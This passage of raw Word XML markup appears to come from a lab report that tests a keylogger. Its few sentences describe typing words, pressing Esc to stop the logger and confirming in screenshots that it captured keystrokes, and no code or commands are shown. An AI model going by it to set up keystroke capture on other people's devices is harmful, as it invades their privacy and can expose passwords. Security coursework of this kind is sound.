          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A57863E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We will type different word to check its working and then we will press Esc key to stop its working.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EC51FC">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4982845" cy="988060"/>
            <wp:effectExtent l="0" t="0" r="635" b="2540"/>
            <wp:docPr id="4" name="Picture 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5"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4982845" cy="988060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A099D7">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="536D4AC9">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="611CE0B6">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5909F3">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E79634E">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351DE8FF">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C777494">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>As we have stopped keylogger we will check whether it has captured keylogs or not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1759072A">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4076065" cy="2387600"/>
            <wp:effectExtent l="0" t="0" r="8255" b="5080"/>
            <wp:docPr id="5" name="Picture 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6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4076065" cy="2387600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCDF902">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CADEAC1">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Here we can see that it has captured the strokes of the keyboard and it is working properly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70548095">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="710FDF15">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B48740F">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF42D74">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>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085669"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="91085669"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="B88F96C5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B88F96C5"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="2C11FC80"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2C11FC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B9372B0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5B9372B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AB057A"/>
    <w:rsid w:val="0A845769"/>
    <w:rsid w:val="22A97844"/>
    <w:rsid w:val="29DA2270"/>
    <w:rsid w:val="2CC67087"/>
    <w:rsid w:val="389D5EE2"/>
    <w:rsid w:val="4C4B7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2025-10-28T11:35:49Z</dcterms:created>
  <dc:creator>ST</dc:creator>
  <cp:lastModifiedBy>ST</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-28T14:22:39Z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14A906FD859447208C9AFEFBB21C26FA_12</vt:lpwstr>
  </property>
</Properties>
</file>